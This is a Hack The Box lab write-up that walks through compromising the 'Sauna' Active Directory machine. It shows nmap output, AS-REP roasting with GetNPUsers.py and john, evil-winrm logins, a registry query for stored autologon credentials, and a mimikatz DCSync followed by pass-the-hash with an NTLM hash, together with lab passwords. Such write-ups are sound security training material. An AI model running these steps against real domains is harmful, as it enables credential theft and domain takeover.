Hack The Box — Sauna
Overview
Sauna is an easy difficulty Windows machine that features Active Directory enumeration and exploitation. The initial enumeration expose some Names using which we can create some username list.Using GetNPUsers.py we expose valid user and hash. using that we can use evil-winrm to get a shell as user. Enumerating and looking in the Registry we see a password for a service account using that we can get a shell as the Service. We see that svc_loanmgr has permission to DCSync so using that we can use Mimikatz to dump Administrator Credentials and use evil-winrm to get shell as Administrator.
Enumeration
Nmap
Like all machines, we begin by enumerating all open services. Doing so, we get a ton of results
nmap -sC -sV -v -oA nmap/sauna 10.10.10.175Nmap scan report for 10.10.10.175
Host is up (0.16s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-07-18 18:54:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=7/18%Time=5F12E1B1%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h05m07s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-07-19T00:11:36
|_ start_date: N/A
NSE: Script Post-scanning.
Initiating NSE at 13:54
Completed NSE at 13:54, 0.00s elapsed
Initiating NSE at 13:54
Completed NSE at 13:54, 0.00s elapsed
Initiating NSE at 13:54
Completed NSE at 13:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 323.91 seconds
The first ports that immediately jumped out at me were 80, 88, and 389. I decided to turn my reconnaissance towards these ports. Port 80 told me that it was running a Microsoft IIS web server. Port 88 showed that it was using Kerberos for authentication to the server. Port 389 identified the system as a Domain Controller.
Let’s proceed to examine the website.
Web
Navigating to the website in a browser reveals a website for a bank. The Wappalyzer add-on doesn’t identify any vulnerable technologies.
Just scrolling around, nothing interested jumps out. All the pages are static, and the forms don’t work. There isn’t much of value here. On the “About Us” page, there’s a list of the team
using the above name i created a list of users as
Kerberoasting
User
Using the list I tried to use GetNPUsers.py to try to get valid user and its hash
python GetNPUsers.py EGOTISTICALBANK/ -usersfile user.txt -format john -dc-ip 10.10.10.175And we get a hit on fsmith as it was vulnerable to ASREProast and a hash for that using john to crack the password as
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt and we get a valid credentials as fsmith:Thestrokes23
Evil-WinRM
With the gained credentials fsmith / Thestrokes23 we can try to login using WinRM. Windows Remote Management (WinRM), is a Windows-native built-in remote management protocol and it is often enabled for users that need to manage systems remotely. We can use evil-winrm to connect to the remote system.
./evil-winrm.rb -u fsmith -p Thestrokes23 -i 10.10.10.175
The user flag is located in C:\Users\Fsmith\Desktop\
Privilege Escalation
Enumerating User and looking for any other user we find another user as svc_loanmgr in net user
The command net user svc_loanmgr reveals that this user is also part of the RemoteManagement Users group.
looking for password for that user i looked and used RegistryLookup to get DefaultPassword.
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
The registry file containing the username (svc_loanmanager) and password (Moneymakestheworldgoround!) for this login.
Use evil-winrm again to login as this new user.
Hash
Mimikatz
I used Mimikatz . I’ll download the latest release from the release page, and upload the 64-bit binary to Sauna:
Try to use ./mimikatz.exe “lsadump::dcsync /user:administrator” “exit” to successfully obtain the domain control administrator user password
Mimikatz got the NTLM hash for user Administrator which we can use upon logging in without the need of the users password. The NTLM hash:
d9485863c1e9e05851aa40cbb4ab9dffThen use ./evil-winrm.rb -u administrator -H d9485863c1e9e05851aa40cbb4ab9dff -i 10.10.10.175 to log in to the target host successfully.
The root flag is located in C:\Users\Administrator\Desktop\
And we successfully root the box!
Thank you for taking the time to read my write-up. I am interested in other ways this machine has been solved. Feel free to reach out to me and we can discuss it. Thanks!
